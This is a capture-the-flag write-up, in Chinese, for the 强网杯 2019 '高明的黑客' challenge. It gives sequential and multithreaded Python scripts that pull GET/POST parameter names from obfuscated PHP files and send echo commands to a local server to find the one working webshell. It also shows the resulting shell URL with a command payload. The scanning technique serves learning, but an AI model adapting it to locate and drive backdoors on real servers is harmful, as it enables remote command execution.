# 高明的黑客

用 D 盾扫描源码，会报出一大堆经过混淆的 shell，不过其中没有几个是能用的。这题考察的是脚本编写能力：需要写个脚本逐个测试，找出哪个是能用的。

上py

```python
import os
import requests
# Local directory that holds the unpacked challenge sources to scan.
path = "D://SOURCE//BUUOJ//[强网杯 2019]高明的黑客//www.tar//www//src//"
# Names of every entry directly inside that directory.
files = os.listdir(path)


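# Collect the GET parameter names referenced by one source file
def GET(filename):
    """Return the ``$_GET['...']`` parameter names found in one source file.

    Args:
        filename: File name relative to the module-level ``path`` directory.

    Returns:
        A list of parameter names in order of appearance; duplicates are
        kept.
    """
    marker = "$_GET['"
    getList = []
    # The context manager closes the handle, so scanning a large directory
    # does not accumulate open file descriptors.
    with open(path + filename, 'r') as f:
        for line in f:
            startIndex = line.find(marker)
            # find() returns -1 when absent; testing "> 0" would skip a
            # match in column 0. The loop also picks up further references
            # on the same line.
            while startIndex != -1:
                startIndex += len(marker)
                endIndex = line.find("'", startIndex)
                if endIndex == -1:
                    # No closing quote on this line: nothing usable to record.
                    break
                getList.append(line[startIndex:endIndex])
                startIndex = line.find(marker, endIndex)
    return getList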


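# Collect the POST parameter names referenced by one source file
def POST(filename):
    """Return the ``$_POST['...']`` parameter names found in one source file.

    Args:
        filename: File name relative to the module-level ``path`` directory.

    Returns:
        A list of parameter names in order of appearance; duplicates are
        kept.
    """
    marker = "$_POST['"
    postList = []
    # The context manager closes the handle, so scanning a large directory
    # does not accumulate open file descriptors.
    with open(path + filename, 'r') as f:
        for line in f:
            startIndex = line.find(marker)
            # find() returns -1 when absent; testing "> 0" would skip a
            # match in column 0. The loop also picks up further references
            # on the same line.
            while startIndex != -1:
                startIndex += len(marker)
                endIndex = line.find("'", startIndex)
                if endIndex == -1:
                    # No closing quote on this line: nothing usable to record.
                    break
                postList.append(line[startIndex:endIndex])
                startIndex = line.find(marker, endIndex)
    return postList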


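if __name__ == "__main__":
    # Sequentially test every parameter name of every source file against the
    # local copy of the challenge and stop at the first one that responds.
    for file in files:
        if file != ".idea":
            print("OPEN FILE:" + file)
            get = GET(file)
            for i in get:
                # str.format() only fills {} fields; with %s placeholders the
                # URL stayed a literal template and every request hit the
                # same non-existent path.
                url = "http://127.0.0.1/{}?{}={}".format(file, i, 'echo "GET SUCCESS"')
                try:
                    # Without a timeout one stalled response blocks the
                    # whole sequential scan.
                    response = requests.get(url=url, timeout=10)
                except requests.exceptions.RequestException as err:
                    print("REQUEST FAILED {} BY {}: {}".format(file, i, err))
                    continue
                # NOTE(review): the marker is a substring of the value that is
                # sent, so a file that merely reflects the parameter also
                # matches; treat a hit as a candidate to confirm by hand.
                # "in" also matches at offset 0, which find() > 0 did not.
                if "GET SUCCESS" in response.text:
                    print("SUCCESS GET! YOU FIND THE SHELL {} BY {}".format(file, i))
                    raise SystemExit(0)

            post = POST(file)
            for i in post:
                url = "http://127.0.0.1/{}".format(file)
                data = {i: 'echo "POST SUCCESS"'}
                try:
                    # The names come from $_POST, so the value has to travel
                    # in a POST body; requests.get() sent a GET request.
                    response = requests.post(url=url, data=data, timeout=10)
                except requests.exceptions.RequestException as err:
                    print("REQUEST FAILED {} BY {}: {}".format(file, i, err))
                    continue
                if "POST SUCCESS" in response.text:
                    print("SUCCESS POST! YOU FIND THE SHELL {} BY {}".format(file, i))
                    raise SystemExit(0)

        print("CLOSE FILE")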
```

速度太慢了，大概一分钟只能跑七到八个，算了算根本跑不完。

还是要多线程，最后参考大佬脚本搞的。

```
/xk0SzyKwfzw.php?Efa5BVG=echo%20%27success%27
```

```python
import os
import requests
import threading
import time
import sys

# Local directory that holds the unpacked challenge sources to scan.
path = "D://SOURCE//BUUOJ//[强网杯 2019]高明的黑客//www.tar//www//src//"
# Names of every entry directly inside that directory.
files = os.listdir(path)


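# Collect the GET parameter names referenced by one source file
def GET(filename):
    """Return the ``$_GET['...']`` parameter names found in one source file.

    Args:
        filename: File name relative to the module-level ``path`` directory.

    Returns:
        A list of parameter names in order of appearance; duplicates are
        kept.
    """
    marker = "$_GET['"
    getList = []
    # The context manager closes the handle; with many worker threads open at
    # once, leaked descriptors would add up quickly.
    with open(path + filename, 'r') as f:
        for line in f:
            startIndex = line.find(marker)
            # find() returns -1 when absent; testing "> 0" would skip a
            # match in column 0. The loop also picks up further references
            # on the same line.
            while startIndex != -1:
                startIndex += len(marker)
                endIndex = line.find("'", startIndex)
                if endIndex == -1:
                    # No closing quote on this line: nothing usable to record.
                    break
                getList.append(line[startIndex:endIndex])
                startIndex = line.find(marker, endIndex)
    return getList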


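# Collect the POST parameter names referenced by one source file
def POST(filename):
    """Return the ``$_POST['...']`` parameter names found in one source file.

    Args:
        filename: File name relative to the module-level ``path`` directory.

    Returns:
        A list of parameter names in order of appearance; duplicates are
        kept.
    """
    marker = "$_POST['"
    postList = []
    # The context manager closes the handle; with many worker threads open at
    # once, leaked descriptors would add up quickly.
    with open(path + filename, 'r') as f:
        for line in f:
            startIndex = line.find(marker)
            # find() returns -1 when absent; testing "> 0" would skip a
            # match in column 0. The loop also picks up further references
            # on the same line.
            while startIndex != -1:
                startIndex += len(marker)
                endIndex = line.find("'", startIndex)
                if endIndex == -1:
                    # No closing quote on this line: nothing usable to record.
                    break
                postList.append(line[startIndex:endIndex])
                startIndex = line.find(marker, endIndex)
    return postList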


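def get_content(file):
    """Test every parameter name found in *file* against the local server.

    Each name returned by ``GET(file)`` is sent as a query parameter and each
    name returned by ``POST(file)`` as a form field. The first response that
    contains the marker text is saved to ``shell.txt``.

    Args:
        file: File name inside the module-level ``path`` directory; it is
            also used as the path segment under ``/src/`` on the server.

    Raises:
        SystemExit: After a hit has been printed and written to
            ``shell.txt``. In a worker thread this ends only that thread.
    """
    print("OPEN FILE:" + file)
    get = GET(file)
    for i in get:
        url = "http://127.0.0.1/src/{}?{}={}".format(file, i, 'echo "GET '
                                                              'SUCCESS"')
        try:
            # A timeout keeps one stalled response from pinning this worker.
            response = requests.get(url=url, timeout=10)
        except requests.exceptions.RequestException as err:
            print("REQUEST FAILED {} BY {}: {}".format(file, i, err))
            continue
        body = response.text
        # Release the connection on every path, not only after a miss.
        response.close()
        # NOTE(review): the marker is a substring of the value that is sent,
        # so a file that merely reflects the parameter also matches; treat a
        # hit as a candidate to confirm by hand.
        # "in" also matches at offset 0, which find() > 0 did not.
        if "GET SUCCESS" in body:
            print("SUCCESS GET! YOU FIND THE SHELL {} BY {}".format(file, i))
            # Close (and flush) the result file before SystemExit unwinds.
            with open("shell.txt", "w") as f:
                f.write(body)
            sys.exit(0)

    post = POST(file)
    for i in post:
        url = "http://127.0.0.1/src/{}".format(file)
        data = {i: 'echo "POST SUCCESS"'}
        try:
            # The names come from $_POST, so the value has to travel in a
            # POST body; requests.get() sent a GET request.
            response = requests.post(url=url, data=data, timeout=10)
        except requests.exceptions.RequestException as err:
            print("REQUEST FAILED {} BY {}: {}".format(file, i, err))
            continue
        body = response.text
        response.close()
        if "POST SUCCESS" in body:
            print("SUCCESS POST! YOU FIND THE SHELL {} BY {}".format(file, i))
            with open("shell.txt", "w") as f:
                f.write(body)
            sys.exit(0)

    print("CLOSE FILE")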


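if __name__ == "__main__":
    # Upper bound on workers running at the same time. The semaphore was
    # created but never acquired, so it limited nothing.
    s1 = threading.Semaphore(100)
    # NOTE(review): whether assigning this module attribute changes the retry
    # behaviour of requests depends on the installed version - confirm.
    requests.adapters.DEFAULT_RETRIES = 5
    # Set once any worker reports a hit, so no further workers are started.
    found = threading.Event()

    def _worker(name):
        """Run get_content for one file, then free its concurrency slot."""
        try:
            get_content(name)
        except SystemExit:
            # get_content exits only after it has recorded a hit.
            found.set()
        finally:
            s1.release()

    workers = []
    for file in files:
        if found.is_set():
            break
        # Skip directories such as ".idea"; only regular files can be read.
        if not os.path.isfile(path + file):
            continue
        s1.acquire()
        # Each file is handled once, in a worker. Calling get_content(file)
        # inline before starting the thread scanned every file twice and
        # kept the loop sequential.
        t = threading.Thread(target=_worker, args=(file,))
        t.start()
        workers.append(t)

    # Wait for in-flight workers so their output is complete before exit.
    for t in workers:
        t.join()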
```


